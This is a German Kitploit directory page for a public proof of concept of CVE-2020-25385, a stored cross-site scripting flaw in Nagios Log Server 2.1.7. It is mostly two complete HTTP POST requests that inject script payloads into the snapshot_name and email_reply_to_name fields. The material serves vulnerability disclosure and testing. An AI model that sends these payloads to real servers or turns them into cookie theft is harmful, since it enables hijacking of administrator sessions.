Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Ein gespeichertes Cross-Site-Scripting (XSS) in Nagios Log Server 2.1.7 kann dazu führen, dass ein Angreifer schädliche Aktionen gegenüber Benutzern ausführt, die einen bösartig erstellten Link oder eine Webseite eines Drittanbieters öffnen. | Kitploit
Tools/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Ein gespeichertes Cross-Site-Scripting (XSS) in Nagios Log Server 2.1.7 kann dazu führen, dass ein Angreifer schädliche Aktionen gegenüber Benutzern ausführt, die einen bösartig erstellten Link oder eine Webseite eines Drittanbieters öffnen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
32vor 5 JahrenNoch nicht geprüft

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Eine gespeicherte Cross-Site-Scripting-Schwachstelle (XSS) in Nagios Log Server 2.1.7 kann dazu führen, dass ein Angreifer bösartige Aktionen gegenüber Benutzern ausführt, die einen manipulierten Link oder eine Webseite eines Drittanbieters öffnen.

Nagios Log Server 2.1.7 und ältere Versionen sind von diesen Schwachstellen betroffen.

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

Um die Schwachstelle auszunutzen, könnte jemand eine POST-Anfrage an '/nagioslogserver/configure/create_snapshot' senden, indem der Parameter 'snapshot_name' im Anfragetext manipuliert wird, um Benutzer zu beeinträchtigen, die einen manipulierten Link oder eine Webseite eines Drittanbieters öffnen.

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

Um die Schwachstelle auszunutzen, könnte jemand eine POST-Anfrage an '/nagioslogserver/admin/mail' senden, indem der Parameter 'email_reply_to_name' im Anfragetext manipuliert wird, um Benutzer zu beeinträchtigen, die einen manipulierten Link oder eine Webseite eines Drittanbieters öffnen.

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

Tool herunterladen